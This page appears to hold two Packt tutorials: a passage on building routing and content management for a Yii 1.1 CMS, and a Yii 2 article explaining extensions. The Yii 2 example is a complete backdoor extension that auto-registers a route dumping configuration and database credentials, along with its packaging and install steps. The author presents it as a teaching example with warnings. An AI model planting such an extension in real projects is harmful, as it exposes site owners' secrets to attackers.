    'urlFormat' => 'path',
    'showScriptName' => false
)

Next, within our protected/components folder, we need to create CMSUrlManager.php:

class CMSUrlManager extends CUrlManager {}

CUrlManager works by populating a rules array. When Yii is bootstrapped, it will trigger the processRules() method to determine which route should be executed. We can overload this method to inject our own rules, which will ensure that the action we want to be executed is executed.

To get started, let's first define a set of default routes that we want loaded. The routes defined in the following code snippet will allow for pagination on our search and home pages, enable a static path for our sitemap.xml file, and provide a route for HybridAuth to use for social authentication:

public $defaultRules = array(
    '/sitemap.xml' => '/content/sitemap',
    '/search/<page:\d+>' => '/content/search',
    '/search' => '/content/search',
    '/blog/<page:\d+>' => '/content/index',
    '/blog' => '/content/index',
    '/' => '/content/index',
    '/hybrid/<provider:\w+>' => '/hybrid/index',
);

Then, we'll implement our processRules() method:

protected function processRules() {}

CUrlManager already has a public property that we can use to modify the rules, so we'll inject our own rules into it. The rules property is the same property that can be accessed from within our config file. Since processRules() gets called on every page load, we'll also utilize caching so that our rules don't have to be generated every time. We'll start by trying to load any pregenerated rules from our cache, depending upon whether we are in debug mode or not:

$this->rules = !YII_DEBUG ? Yii::app()->cache->get('Routes') : array();

If the rules we get back are already set up, we'll simply return them; otherwise, we'll generate the rules, put them into our cache, and then append our basic URL rules:

if ($this->rules == false || empty($this->rules))
{
    $this->rules = array();
    $this->rules = $this->generateClientRules();
    $this->rules = CMap::mergeArray($this->addRSSRules(), $this->rules);

    Yii::app()->cache->set('Routes', $this->rules);
}

$this->rules['<controller:\w+>/<action:\w+>/<id:\w+>'] = '/';
$this->rules['<controller:\w+>/<action:\w+>'] = '/';

return parent::processRules();

For abstraction purposes, within our processRules() method we've used two methods that we'll need to create: generateClientRules(), which will generate the rules for content and categories, and addRSSRules(), which will generate the RSS routes for each category.
The first method, generateClientRules(), simply merges our default rules, defined earlier, with the rules generated from our content and categories, which are populated by the generateRules() method:

private function generateClientRules()
{
    $rules = CMap::mergeArray($this->defaultRules, $this->rules);
    return CMap::mergeArray($this->generateRules(), $rules);
}

private function generateRules()
{
    return CMap::mergeArray($this->generateContentRules(), $this->generateCategoryRules());
}

The generateRules() method that we just defined actually calls the methods that build our routes. Each route is a key-value pair that will take the following form:

array(
    '<slug>' => '<controller>/<action>/id/<id>'
)

Content rules will consist of every entry that is published. Have a look at the following code:

private function generateContentRules()
{
    $rules = array();
    $criteria = new CDbCriteria;
    $criteria->addCondition('published = 1');
    $content = Content::model()->findAll($criteria);

    foreach ($content as $el)
    {
        if ($el->slug == NULL)
            continue;

        $pageRule = $el->slug . '/<page:\d+>';
        $rule = $el->slug;

        if ($el->slug == '/')
            $pageRule = $rule = '';

        $rules[$pageRule] = "content/view/id/{$el->id}";
        $rules[$rule] = "content/view/id/{$el->id}";
    }

    return $rules;
}

Our category rules will consist of all the categories in our database. Have a look at the following code:

private function generateCategoryRules()
{
    $rules = array();
    $categories = Category::model()->findAll();

    foreach ($categories as $el)
    {
        if ($el->slug == NULL)
            continue;

        $pageRule = $el->slug . '/<page:\d+>';
        $rule = $el->slug;

        if ($el->slug == '/')
            $pageRule = $rule = '';

        $rules[$pageRule] = "category/index/id/{$el->id}";
        $rules[$rule] = "category/index/id/{$el->id}";
    }

    return $rules;
}

Finally, we'll add our RSS rules, which will allow RSS readers to read all content for the entire site or for a particular category, as follows:

private function addRSSRules()
{
    $routes = array();
    $categories = Category::model()->findAll();
    foreach ($categories as $category)
        $routes[$category->slug . '.rss'] = "category/rss/id/{$category->id}";

    $routes['blog.rss'] = '/category/rss';
    return $routes;
}
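One loose end worth noting: the generated routes are cached under the 'Routes' key, so a brand-new slug won't be routable until that cache entry expires or is flushed. A hedged sketch of one way to keep it in sync (assuming no other invalidation exists in the skeleton project) is to flush the entry from CMSSlugActiveRecord whenever a slugged record is saved or deleted:

// in CMSSlugActiveRecord: flush the cached routes whenever a slug may change
protected function afterSave()
{
    Yii::app()->cache->delete('Routes');
    parent::afterSave();
}

protected function afterDelete()
{
    Yii::app()->cache->delete('Routes');
    parent::afterDelete();
}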
Displaying and managing content

Now that Yii knows how to route our content, we can begin work on displaying and managing it. Begin by creating a new controller called ContentController in protected/controllers that extends CMSController. Have a look at the following line of code:

class ContentController extends CMSController {}

To start with, we'll define our accessRules() method and the default layout that we're going to use:

public $layout = 'default';

public function filters()
{
    return array(
        'accessControl',
    );
}

public function accessRules()
{
    return array(
        array('allow',
            'actions' => array('index', 'view', 'search'),
            'users' => array('*')
        ),
        array('allow',
            'actions' => array('admin', 'save', 'delete'),
            'users' => array('@'),
            'expression' => 'Yii::app()->user->role==2'
        ),
        array('deny', // deny all users
            'users' => array('*'),
        ),
    );
}

Rendering the sitemap

The first method we'll implement is our sitemap action. In our ContentController, create a new method called actionSitemap():

public function actionSitemap() {}

The steps to be performed are as follows:

Since sitemaps come in XML formatting, we'll start by disabling the WebLogRoute defined in our protected/config/main.php file. This will ensure that our XML validates when search engines attempt to index it:

Yii::app()->log->routes[0]->enabled = false;

We'll then send the appropriate XML headers, disable the rendering of the layout, and flush any content that may have been queued to be sent to the browser:

ob_end_clean();
header('Content-type: text/xml; charset=utf-8');
$this->layout = false;

Then, we'll load all the published entries and categories and send them to our sitemap view:

$content = Content::model()->findAllByAttributes(array('published' => 1));
$categories = Category::model()->findAll();

$this->renderPartial('sitemap', array(
    'content' => $content,
    'categories' => $categories,
    'url' => 'http://' . Yii::app()->request->serverName . Yii::app()->baseUrl
));

Finally, we have two options for rendering this view. We can either make it a part of our theme in themes/main/views/content/sitemap.php, or we can place it in protected/views/content/sitemap.php. Since a sitemap's structure is unlikely to change, let's put it in the protected/views folder:

<?php echo '<?xml version="1.0" encoding="UTF-8"?>'; ?>
<urlset >
<?php foreach ($content as $v): ?>
    <url>
        <loc><?php echo $url . '/' . htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc>
        <lastmod><?php echo date('c', strtotime($v['updated'])); ?></lastmod>
        <changefreq>weekly</changefreq>
        <priority>1</priority>
    </url>
<?php endforeach; ?>
<?php foreach ($categories as $v): ?>
    <url>
        <loc><?php echo $url . '/' . htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc>
        <lastmod><?php echo date('c', strtotime($v['updated'])); ?></lastmod>
        <changefreq>weekly</changefreq>
        <priority>0.7</priority>
    </url>
<?php endforeach; ?>
</urlset>

You can now load http://chapter6.example.com/sitemap.xml in your browser to see the sitemap. Before you make your site live, be sure to submit this file to search engines for them to index.
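Besides manual submission, a common convention (independent of Yii) is to point crawlers at the sitemap from a robots.txt file at the web root:

Sitemap: http://chapter6.example.com/sitemap.xml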
Displaying a list view of content

Next, we'll implement the actions necessary to display all of our content and a particular post. We'll start by providing a paginated view of our posts. Since CListView and the Content model's search() method already provide this functionality, we can utilize those classes to generate and display this data.

To begin with, open protected/models/Content.php and modify the return value of the search() method as follows. This will ensure that Yii's pagination uses the correct variable in our CListView and tell Yii how many results to load per page:

return new CActiveDataProvider($this, array(
    'criteria' => $criteria,
    'pagination' => array(
        'pageSize' => 5,
        'pageVar' => 'page'
    )
));

Next, implement the actionIndex() method with the $page parameter. We've already told our UrlManager how to handle this, which means that we'll get pretty URIs for pagination (for example, /blog, /blog/2, /blog/3, and so on):

public function actionIndex($page=1)
{
    // Model search without $_GET params
    $model = new Content('search');
    $model->unsetAttributes();
    $model->published = 1;

    $this->render('//content/all', array(
        'dataprovider' => $model->search()
    ));
}

Then, we'll create a view in themes/main/views/content/all.php that will display the data within our dataProvider:

<?php $this->widget('zii.widgets.CListView', array(
    'dataProvider' => $dataprovider,
    'itemView' => '//content/list',
    'summaryText' => '',
    'pager' => array(
        'htmlOptions' => array('class' => 'pager'),
        'header' => '',
        'firstPageCssClass' => 'hide',
        'lastPageCssClass' => 'hide',
        'maxButtonCount' => 0
    )
)); ?>

Finally, copy themes/main/views/content/list.php (the itemView used above) from the project resources folder so that our views can render. Since our database has already been populated with some sample data, you can start playing around with the results right away, as shown in the following screenshot:

Displaying content by ID

Since our routing rules are already set up, displaying our content is extremely simple. All we have to do is search for a published model with the ID passed to the view action and render it:

public function actionView($id=NULL)
{
    // Retrieve the data
    $content = Content::model()->findByPk($id);

    // beforeViewAction should catch this
    if ($content == NULL || !$content->published)
        throw new CHttpException(404, 'The article you specified does not exist.');

    $this->render('view', array(
        'id' => $id,
        'post' => $content
    ));
}

After copying themes/main/views/content/view.php from the project resources folder into your project, you'll be able to click through to a particular post from the home page.

In its present form, this action has introduced an interesting side effect that could negatively impact our SEO rankings on search engines: the same entry can now be accessed from two URIs. For example, http://chapter6.example.com/content/view/id/1 and http://chapter6.example.com/quis-condimentum-tortor now bring up the same post. Fortunately, correcting this bug is fairly easy. Since the goal of our slugs is to provide more descriptive URIs, we'll simply block access to the view if a user tries to access it from the non-slugged URI.

We'll do this by creating a new method called beforeViewAction() that takes the entry ID as a parameter and gets called right after the actionView() method is called. This private method will simply check the URI from CHttpRequest to determine how actionView was accessed, and return a 404 if it wasn't through our beautiful slugs:

private function beforeViewAction($id=NULL)
{
    // If we do not have an ID, consider it to be null, and throw a 404 error
    if ($id == NULL)
        throw new CHttpException(404, 'The specified post cannot be found.');

    // Retrieve the HTTP request
    $r = new CHttpRequest();

    // Retrieve the actual URI
    $requestUri = str_replace($r->baseUrl, '', $r->requestUri);

    // Retrieve the route
    $route = '/' . $this->getRoute() . '/' . $id;
    $requestUri = preg_replace('/\?(.*)/', '', $requestUri);

    // If the route and the URI are the same, then a direct access attempt
    // was made, and we need to block access to the controller
    if ($requestUri == $route)
        throw new CHttpException(404, 'The requested post cannot be found.');

    return str_replace($r->baseUrl, '', $r->requestUri);
}

Then, right after our actionView starts, we can simultaneously set the correct return URL and block access to the content if it wasn't accessed through the slug, as follows:

Yii::app()->user->setReturnUrl($this->beforeViewAction($id));

Adding comments to our CMS with Disqus

Presently, our content is only informative in nature: we have no way for our users to tell us what they thought about an entry. To encourage engagement, we can add a commenting system to our CMS to further engage with our readers. Rather than writing our own commenting system, we can leverage Disqus, a free, third-party commenting system. Disqus comments are implemented in JavaScript, and we can create a custom widget wrapper for them to display comments on our site. The steps are as follows:

To begin with, log in to the Disqus account you created at the beginning of this article, as outlined in the prerequisites section. Then, navigate to http://disqus.com/admin/create/ and fill out the form fields as prompted and as shown in the following screenshot:

Then, add a disqus section to your protected/config/params.php file with your site shortname:

'disqus' => array(
    'shortname' => 'ch6disqusexample',
)

Next, create a new widget in protected/components called DisqusWidget.php. This widget will be loaded within our view and will be populated by our Content model:

class DisqusWidget extends CWidget {}

Begin by specifying the public properties that our view will be able to inject into, as follows:

public $shortname = NULL;
public $identifier = NULL;
public $url = NULL;
public $title = NULL;

Then, overload the init() method to load the Disqus JavaScript callback and to populate the JavaScript variables with those passed to the widget, as follows:

public function init()
{
    parent::init();

    if ($this->shortname == NULL)
        throw new CHttpException(500, 'Disqus shortname is required');

    echo "<div id='disqus_thread'></div>";
    Yii::app()->clientScript->registerScript('disqus', "
        var disqus_shortname = '{$this->shortname}';
        var disqus_identifier = '{$this->identifier}';
        var disqus_url = '{$this->url}';
        var disqus_title = '{$this->title}';

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    ");
}

Finally, within our themes/main/views/content/view.php file, load the widget as follows:

<?php $this->widget('DisqusWidget', array(
    'shortname' => Yii::app()->params['includes']['disqus']['shortname'],
    'url' => $this->createAbsoluteUrl('/' . $post->slug),
    'title' => $post->title,
    'identifier' => $post->id
)); ?>

Now, when you load any given post, Disqus comments will also be loaded with it. Go ahead and give it a try!

Searching for content

Next, we'll implement a search method so that our users can search for posts.
To do this, we'll create an instance of CActiveDataProvider and pass its data to our themes/main/views/content/all.php view to be rendered and paginated:

public function actionSearch()
{
    $param = Yii::app()->request->getParam('q');

    $criteria = new CDbCriteria;
    $criteria->addSearchCondition('title', $param, 'OR');
    $criteria->addSearchCondition('body', $param, 'OR');

    $dataprovider = new CActiveDataProvider('Content', array(
        'criteria' => $criteria,
        'pagination' => array(
            'pageSize' => 5,
            'pageVar' => 'page'
        )
    ));

    $this->render('//content/all', array(
        'dataprovider' => $dataprovider
    ));
}

Since our view file already exists, we can now search for content in our CMS (the /search route we defined earlier expects the query in the q parameter).

Managing content

Next, we'll implement a basic set of management tools that will allow us to create, update, and delete entries.

We'll start by defining our loadModel() method and the actionDelete() method:

private function loadModel($id=NULL)
{
    if ($id == NULL)
        throw new CHttpException(404, 'No entry with that ID exists');

    $model = Content::model()->findByPk($id);

    if ($model == NULL)
        throw new CHttpException(404, 'No entry with that ID exists');

    return $model;
}

public function actionDelete($id)
{
    $this->loadModel($id)->delete();
    $this->redirect($this->createUrl('content/admin'));
}

Next, we can implement our admin view, which will allow us to view all the content in our system and create new entries. Be sure to copy the themes/main/views/content/admin.php file from the project resources folder into your project before using this view:

public function actionAdmin()
{
    $model = new Content('search');
    $model->unsetAttributes();

    if (isset($_GET['Content']))
        $model->attributes = $_GET;

    $this->render('admin', array('model' => $model));
}

Finally, we'll implement a save action to create and update entries. Saving content will simply pass it through our Content model's validation rules. The only override we'll add is ensuring that the author is set to the user editing the entry. Before using this view, be sure to copy the themes/main/views/content/save.php file from the project resources folder into your project:

public function actionSave($id=NULL)
{
    if ($id == NULL)
        $model = new Content;
    else
        $model = $this->loadModel($id);

    if (isset($_POST['Content']))
    {
        $model->attributes = $_POST['Content'];
        $model->author_id = Yii::app()->user->id;

        if ($model->save())
        {
            Yii::app()->user->setFlash('info', 'The article was saved');
            $this->redirect($this->createUrl('content/admin'));
        }
    }

    $this->render('save', array('model' => $model));
}

At this point, you can log in to the system using the credentials provided in the following table and start managing entries:

Username: [email protected]    Password: test
Username: [email protected]    Password: test

Summary

In this article, we dug deeper into the Yii framework by manipulating our CUrlManager class to generate completely dynamic and clean URIs. We also covered the use of Yii's built-in theming to dynamically change the frontend appearance of our site by simply changing a configuration value.

Resources for Article:

Further resources on this subject:
Creating an Extension in Yii 2 [Article]
Yii 1.1: Using Zii Components [Article]
Agile with Yii 1.1 and PHP5: The TrackStar Application [Article]

Creating an Extension in Yii 2

Packt
24 Sep 2014
22 min read
In this article by Mark Safronov, co-author of the book Web Application Development with Yii 2 and PHP, we'll learn to create our own extension using a simple way of installation. There is a process we have to follow, though, and some preparation will be needed to wire up your classes to the Yii application. The whole article will be devoted to this process. (For more resources related to this topic, see here.)

Extension idea

So, how are we going to extend the Yii 2 framework as an example for this article? Let's become vile this time and make a malicious extension, which will provide a sort of phishing backdoor for us. Never do exactly the thing we'll describe in this article! It'll not give you instant access to the attacked website anyway, but a skilled black hat hacker can easily get enough information to achieve total control over your application.

The idea is this: our extension will provide a special route (a controller with a single action inside) that will dump the complete application configuration to the web page. Let's say it'll be reachable from the route /app-info/configuration.

We cannot, however, just get the contents of the configuration file itself, at least not reliably. At the point where we can attach ourselves to the application instance, the original configuration array is inaccessible, and even if it were accessible, we couldn't be sure about where it came from anyway. So, we'll inspect the runtime status of the application and return the most important pieces of information we can fetch at the stage of the controller action resolution. That's the exact payload we want to introduce:

public function actionConfiguration()
{
    $app = Yii::$app;
    $config = [
        'components' => $app->components,
        'basePath' => $app->basePath,
        'params' => $app->params,
        'aliases' => Yii::$aliases
    ];
    return \yii\helpers\Json::encode($config);
}

The preceding code is the core of the extension and is assumed in the following sections. In fact, if you know the value of the basePath setting of the application, a list of its aliases, the settings for the components (among which the DB connection may reside), and all the custom parameters that developers set manually, you can map the target application quite reliably. Given that you know all the credentials this way, you now have an enormous amount of highly valuable information about the application. All you need to do now is make the user install this extension.

Creating the extension contents

Our plan is as follows:

We will develop our extension in a folder which is different from our example CRM application.
This extension will be named yii2-malicious, to be consistent with the naming of other Yii 2 extensions.
Given the kind of payload we saw earlier, our extension will consist of a single controller and some special wiring code (which we haven't learned about yet) to automatically attach this controller to the application.
Finally, to consider this subproject a true Yii 2 extension and not just some random library, we want it to be installable in the same way as other Yii 2 extensions.

Preparing the boilerplate code for the extension

Let's make a separate directory, initialize the Git repository there, and add the AppInfoController to it.
In the bash command line, this can be achieved with the following commands:

$ mkdir yii2-malicious && cd $_
$ git init
$ > AppInfoController.php

Inside the AppInfoController.php file, we'll write the usual boilerplate code for a Yii 2 controller, as follows:

namespace malicious;

use yii\web\Controller;

class AppInfoController extends Controller
{
    // Action here
}

Put the action defined in the preceding code snippet inside this controller and we're done with it. Note the namespace: it is not the same as the folder this controller is in, and this is not according to our usual autoloading rules. We will see later in this article that this is not an issue, because of how Yii 2 treats the autoloading of classes from extensions.

Now this controller needs to be wired to the application somehow. We already know that the application has a special property called controllerMap, in which we can manually attach controller classes. However, how do we do this automatically, and better yet, right at the application startup time? Yii 2 has a special feature called bootstrapping to support exactly this: attaching some activity at the beginning of the application lifetime (not at the very beginning, but certainly before handling the request). This feature is tightly related to the extensions concept in Yii 2, so it's a perfect time to explain it.

FEATURE – bootstrapping

To explain the bootstrapping concept in short: you can declare some components of the application in the yii\base\Application::$bootstrap property, and they'll be properly instantiated at the start of the application. If any of these components implements the BootstrapInterface interface, its bootstrap() method will be called, so you'll get the application initialization enhancement for free. Let's elaborate on this.

The yii\base\Application::$bootstrap property holds an array of generic values that you tell the framework to initialize beforehand. It's basically an improvement over the preload concept from Yii 1.x. You can specify four kinds of values to initialize, as follows:

The ID of an application component
The ID of some module
A class name
A configuration array

If it's the ID of a component, this component is fully initialized. If it's the ID of a module, this module is fully initialized. This matters greatly, because Yii 2 employs lazy loading for the components and modules system, and they are usually initialized only when explicitly referenced. Being bootstrapped means that their initialization, regardless of whether it's slow or resource-consuming, always happens, and always at the start of the application.

If you have a component and a module with identical IDs, the component will be initialized and the module will not be initialized!

If the value mentioned in the bootstrap property is a class name or a configuration array, then an instance of the class in question is created using the yii\BaseYii::createObject() facility. The instance created will be thrown away immediately if it doesn't implement the yii\base\BootstrapInterface interface. If it does, its bootstrap() method will be called; then the object will be thrown away.

So, what's the effect of this bootstrapping feature? We already used it while installing the debug extension: we had to bootstrap the debug module using its ID, for it to be able to attach the event handler that gives us the debug toolbar at the bottom of each page of our web application.
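Expressed as a configuration sketch, all four kinds of values could sit side by side like this (the component and module IDs and the class names here are illustrative, not from our project):

// in the application configuration
'bootstrap' => [
    'log',                                  // the ID of an application component
    'debug',                                // the ID of a module
    'app\components\AuditBootstrap',        // a class name
    ['class' => 'app\components\Banner'],   // a configuration array
],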
This feature is indispensable if you need to be sure that some activity will always take place at the start of the application lifetime. The BootstrapInterface interface is basically the incarnation of the command pattern. By implementing this interface, we gain the ability to attach any activity, not necessarily bound to a component or module, to the application initialization.

FEATURE – extension registering

The bootstrapping feature is repeated in the handling of the yii\base\Application::$extensions property. This property is the only place where the concept of an extension can be seen in the Yii framework. Extensions in this property are described as a list of arrays, and each of them should have the following fields:

name: This field holds the name of the extension.
version: This field holds the extension's version (nothing will really check it, so it's only for reference).
bootstrap: This field holds the data for this extension's bootstrap. It is filled with the same elements as Yii::$app->bootstrap described previously, and has the same semantics.
alias: This field holds the mapping from Yii 2 path aliases to real directory paths.

When the application registers an extension, it does two things, in the following order:

It registers the aliases from the extension, using the Yii::setAlias() method.
It initializes the thing mentioned in the bootstrap of the extension, in exactly the same way we described in the previous section.

Note that the extensions' bootstraps are processed before the application's bootstraps.

Registering aliases is crucial to the whole concept of extensions in Yii 2, because of the Yii 2 PSR-4 compatible autoloader. Here is a quote from the documentation block for the yii\BaseYii::autoload() method:

If the class is namespaced (e.g. yii\base\Component), it will attempt to include the file associated with the corresponding path alias (e.g. @yii/base/Component.php).

This autoloader allows loading classes that follow the PSR-4 standard and have their top-level namespace or sub-namespaces defined as path aliases. The PSR-4 standard is available online at http://www.php-fig.org/psr/psr-4/.

Given that behavior, the alias setting of the extension is basically a way to tell the autoloader the name of the top-level namespace of the classes in your extension code base. Let's say you have the following value for the alias setting of your extension:

"alias" => ["@companyname/extensionname" => "/some/absolute/path"]

If you have the /some/absolute/path/subdirectory/ClassName.php file and, according to PSR-4 rules, it contains the class whose fully qualified name is companyname\extensionname\subdirectory\ClassName, Yii 2 will be able to autoload this class without problems.
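To see the alias mechanics in isolation (using the made-up names and paths from the example above):

// what extension registration effectively does for the alias setting
Yii::setAlias('@companyname/extensionname', '/some/absolute/path');

// after that, the autoloader can resolve this class from
// /some/absolute/path/subdirectory/ClassName.php
$object = new \companyname\extensionname\subdirectory\ClassName();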
Making the bootstrap for our extension – hideous attachment of a controller

We have a controller already prepared in our extension. Now we want this controller to be automatically attached to the application under attack when the extension is processed. This is achievable using the bootstrapping feature we just learned about. Let's create the malicious\Bootstrap class for this cause inside the code base of our extension, with the following boilerplate code:

<?php
namespace malicious;

use yii\base\BootstrapInterface;

class Bootstrap implements BootstrapInterface
{
    /** @param \yii\web\Application $app */
    public function bootstrap($app)
    {
        // Controller addition will be here.
    }
}

With this preparation, the bootstrap() method will be called at the start of the application, provided we wire everything up correctly. But first, we should consider how we manipulate the application to make use of our controller. This is easy, really, because there's the yii\web\Application::$controllerMap property (don't forget that it's inherited from yii\base\Module, though). We'll just do the following inside the bootstrap() method:

$app->controllerMap['app-info'] = 'malicious\AppInfoController';

We will rely on the composer and Yii 2 autoloaders to actually find malicious\AppInfoController.
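Putting the boilerplate and the controllerMap line together, the finished bootstrap class reads as follows:

<?php
namespace malicious;

use yii\base\BootstrapInterface;

class Bootstrap implements BootstrapInterface
{
    /** @param \yii\web\Application $app */
    public function bootstrap($app)
    {
        // attach our controller so the /app-info route resolves
        $app->controllerMap['app-info'] = 'malicious\AppInfoController';
    }
}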
Just imagine that you can do anything inside the bootstrap. For example, you can open a CURL connection with some botnet and send the accumulated application information there. Never believe random extensions on the Web.

This actually concludes what we need to do to complete our extension. All that's left now is to make it installable in the same way as the other Yii 2 extensions we have been using up until now. If you need to attach this malicious extension to your application manually, and you have a folder that holds the code base of the extension at the path /some/filesystem/path, then all you need to do is write the following code inside the application configuration:

'extensions' => array_merge(
    (require __DIR__ . '/../vendor/yiisoft/extensions.php'),
    [
        'malicious/app-info' => [
            'name' => 'Application Information Dumper',
            'version' => '1.0.0',
            'bootstrap' => 'malicious\Bootstrap',
            'alias' => ['@malicious' => '/some/filesystem/path']
            // that's the path to the extension
        ]
    ]
)

Please note the exact way of specifying the extensions setting: we're merging the contents of the extensions.php file supplied by the Yii 2 distribution from composer with our own manual definition of the extension. This extensions.php file is what allows Yiisoft to distribute extensions in such a way that you are able to install them with a single require composer command. Let's learn now what we need to do to repeat this feature.

Making the extension installable as... erm, extension

First, to make it clear: we are talking here only about the situation where Yii 2 is installed by composer, and we want our extension to be installable through composer as well. This gives us the baseline for all of our assumptions. Let's recall the extensions we have installed:

Gii the code generator
The Twitter Bootstrap extension
The Debug extension
The SwiftMailer extension

We can install all of these extensions using composer. We introduced the extensions.php file reference when we installed the Gii extension:

'extensions' => (require __DIR__ . '/../vendor/yiisoft/extensions.php')

If we open the vendor/yiisoft/extensions.php file (given that all the extensions from the preceding list were installed) and look at its contents, we'll see the following code (note that in your installation it can be different):

<?php

$vendorDir = dirname(__DIR__);

return array (
    'yiisoft/yii2-bootstrap' => array (
        'name' => 'yiisoft/yii2-bootstrap',
        'version' => '9999999-dev',
        'alias' => array (
            '@yii/bootstrap' => $vendorDir . '/yiisoft/yii2-bootstrap',
        ),
    ),
    'yiisoft/yii2-swiftmailer' => array (
        'name' => 'yiisoft/yii2-swiftmailer',
        'version' => '9999999-dev',
        'alias' => array (
            '@yii/swiftmailer' => $vendorDir . '/yiisoft/yii2-swiftmailer',
        ),
    ),
    'yiisoft/yii2-debug' => array (
        'name' => 'yiisoft/yii2-debug',
        'version' => '9999999-dev',
        'alias' => array (
            '@yii/debug' => $vendorDir . '/yiisoft/yii2-debug',
        ),
    ),
    'yiisoft/yii2-gii' => array (
        'name' => 'yiisoft/yii2-gii',
        'version' => '9999999-dev',
        'alias' => array (
            '@yii/gii' => $vendorDir . '/yiisoft/yii2-gii',
        ),
    ),
);

One extension was highlighted to stand out from the others. So, what does all this mean to us?

First, it means that Yii 2 somehow generates the required configuration snippet automatically when you install an extension's composer package.
Second, it means that each extension provided by the Yii 2 framework distribution will ultimately be registered in the extensions setting of the application.
Third, all the classes in the extensions are made available in the main application code base by the carefully crafted alias settings inside the extension configuration.
Fourth, the easy installation of Yii 2 extensions is made possible by some integration between the Yii framework and the composer distribution system.

The magic is hidden inside the composer.json manifest of the extensions built into Yii 2. The details of the structure of this manifest are written in the documentation of composer, which is available at https://getcomposer.org/doc/04-schema.md. We'll need only one field, though, and that is type. Yii 2 employs a special type of composer package, named yii2-extension. If you check the manifests of yii2-debug, yii2-swiftmailer, and the other extensions, you'll see that they all have the following line inside:

"type": "yii2-extension",

Normally, composer will not understand that this type of package is to be installed. But the main yii2 package, containing the framework itself, depends on the special auxiliary yii2-composer package:

"require": {
    ... other requirements ...
    "yiisoft/yii2-composer": "*",

This package provides a composer Custom Installer (read about it at https://getcomposer.org/doc/articles/custom-installers.md), which enables this package type. The whole point of the yii2-extension package type is to automatically update the extensions.php file with the information from the extension's manifest file. Basically, all we need to do now is craft the correct composer.json manifest file inside the extension's code base. Let's write it step by step.

Preparing the correct composer.json manifest

We first need a block with an identity:

"name": "malicious/app-info",
"version": "1.0.0",
"description": "Example extension which reveals important information about the application",
"keywords": ["yii2", "application-info", "example-extension"],
"license": "CC-0",

Technically, we must provide only name. Even version can be omitted if our package meets two prerequisites:

It is distributed from some version control system repository, such as a Git repository
It has tags in this repository correctly identifying the versions in the commit history

And we do not want to bother with that right now. Next, we need to depend on the Yii 2 framework, just in case.
Normally, users will install the extension after the framework is already in place, but in the case where the extension is already listed in the require section of the application's composer.json, among other things, we cannot be sure about the exact ordering of the require statements, so it's better (and easier) to just declare the dependency explicitly, as follows:

"require": {
    "yiisoft/yii2": "*"
},

Then, we must provide the type:

"type": "yii2-extension",

After this, for the Yii 2 extension installer, we have to provide two additional blocks. The autoload block will be used to correctly fill the alias section of the extension configuration:

"autoload": {
    "psr-4": {
        "malicious\\": ""
    }
},

What we basically mean by this is that our classes are laid out according to PSR-4 rules, in such a way that the classes in the malicious namespace are placed right inside the root folder.

The second block is extra, in which we tell the installer that we want to declare a bootstrap section for the extension configuration:

"extra": {
    "bootstrap": "malicious\\Bootstrap"
},

Our manifest file is complete now.
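For reference, assembled into a single file, the manifest reads as follows (with version kept, even though it could be omitted under the two prerequisites above):

{
    "name": "malicious/app-info",
    "version": "1.0.0",
    "description": "Example extension which reveals important information about the application",
    "keywords": ["yii2", "application-info", "example-extension"],
    "license": "CC-0",
    "require": {
        "yiisoft/yii2": "*"
    },
    "type": "yii2-extension",
    "autoload": {
        "psr-4": {
            "malicious\\": ""
        }
    },
    "extra": {
        "bootstrap": "malicious\\Bootstrap"
    }
}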
Commit everything to the version control system:

$ git commit -a -m "Added the Composer manifest file to repo"

Now we'll add the tag, at last, corresponding to the version we declared:

$ git tag 1.0.0

We already mentioned earlier the purpose for which we're doing this. All that's left is to tell composer from where to fetch the extension contents.

Configuring the repositories

We need to configure some kind of repository for the extension now so that it is installable. The easiest way is to use the Packagist service, available at https://packagist.org/, which has seamless integration with composer. It has the following pro and con:

Pro: You don't need to declare anything additional in the composer.json file of the application you want to attach the extension to.
Con: You must have a public VCS repository (either Git, SVN, or Mercurial) where your extension is published.

In our case, where we are in fact just learning how to install things using composer, we certainly do not want to make our extension public, so do not use Packagist for the extension example we are building in this article.

Let's recall our goal. Our goal is to be able to install our extension by calling the following command at the root of the code base of some Yii 2 application:

$ php composer.phar require "malicious/app-info:*"

After that, we should see something like the following screenshot after requesting the /app-info/configuration route:

This corresponds to the following structure (the screenshot is from the http://jsonviewer.stack.hu/ web service):

If you put the extension in some public repository, for example GitHub, and register a package at Packagist, this command will work without any preparation in the composer.json manifest file of the target application. But in our case, we will not make this extension public, and so we have two options left.

The first option, which is perfectly suited to our learning cause, is to use the archived package directly. For this, you have to add the repositories section to composer.json in the code base of the application you want to add the extension to:

"repositories": [
    // definitions of repositories for the packages required by this application
]

To specify the repository for a package that should be installed from a ZIP archive, you have to grab the entire contents of the composer.json manifest file of this package (in our case, our malicious/app-info extension) and put them, verbatim, as an element of the repositories section. This is the most complex way to set up a composer package requirement, but this way you can depend on absolutely any folder with files (packaged into an archive). Of course, the contents of the extension's composer.json do not specify the actual location of the extension's files; you have to add this to repositories manually. In the end, you should have the following additional section inside the composer.json manifest file of the target application:

"repositories": [
    {
        "type": "package",
        "package": {
            // ... skipping whatever was copied verbatim from the composer.json of the extension ...
            "dist": {
                "url": "/home/vagrant/malicious.zip", // example file location
                "type": "zip"
            }
        }
    }
]

This way, we specify the location of the package in the filesystem of the same machine and tell composer that this package is a ZIP archive. Now, you should just zip the contents of the yii2-malicious folder we have created for the extension, put the archive somewhere on the target machine, and provide the correct URL. Please note that it's necessary to archive only the contents of the extension and not the folder itself.

After this, you run composer on the machine that really has this URL accessible (you can use http:// type URLs, of course, too), and you get the following response from composer:

To check that Yii 2 really installed the extension, you can open the file vendor/yiisoft/extensions.php and check whether it contains the following block now:

'malicious/app-info' =>
array (
    'name' => 'malicious/app-info',
    'version' => '1.0.0.0',
    'alias' =>
    array (
        '@malicious' => $vendorDir . '/malicious/app-info',
    ),
    'bootstrap' => 'malicious\Bootstrap',
),

(The indentation was preserved as is from the actual file.)

If this block is indeed there, then all you need to do is open the /app-info/configuration route and see whether it reports JSON to you. It should.

The pros and cons of the file-based installation are as follows:

Pro: You can specify any file, as long as it is reachable by some URL. The ZIP archive management capabilities exist on virtually any kind of platform today.
Pro: You don't need to set up any version control system repository. This is of dubious benefit, though.
